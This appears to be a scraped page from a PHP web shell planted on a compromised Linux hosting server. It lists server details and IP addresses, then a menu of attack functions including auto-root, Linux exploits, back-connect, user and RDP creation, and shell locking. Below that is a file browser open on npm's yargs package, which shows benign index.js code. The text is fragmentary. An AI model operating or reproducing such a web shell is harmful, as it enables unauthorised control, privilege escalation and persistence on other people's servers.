Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
yargs /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
lib
[ DIR ]
drwxr-xr-x
?;
locales
[ DIR ]
drwxr-xr-x
?;
node_modules
[ DIR ]
drwxr-xr-x
CHANGELOG.md
75.8
KB
-rw-r--r--
LICENSE
1.17
KB
-rw-r--r--
README.md
3.37
KB
-rw-r--r--
completion.sh.hbs
775
B
-rw-r--r--
index.js
860
B
-rw-r--r--
package.json
2.41
KB
-rw-r--r--
yargs.js
34.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' // classic singleton yargs API, to use yargs // without running as a singleton do: // require('yargs/yargs')(process.argv.slice(2)) const yargs = require('./yargs') Argv(process.argv.slice(2)) module.exports = Argv function Argv (processArgs, cwd) { const argv = yargs(processArgs, cwd, require) singletonify(argv) return argv } /* Hack an instance of Argv with process.argv into Argv so people can do require('yargs')(['--beeble=1','-z','zizzle']).argv to parse a list of args and require('yargs').argv to get a parsed version of process.argv. */ function singletonify (inst) { Object.keys(inst).forEach((key) => { if (key === 'argv') { Argv.__defineGetter__(key, inst.__lookupGetter__(key)) } else { Argv[key] = typeof inst[key] === 'function' ? inst[key].bind(inst) : inst[key] } }) }
Close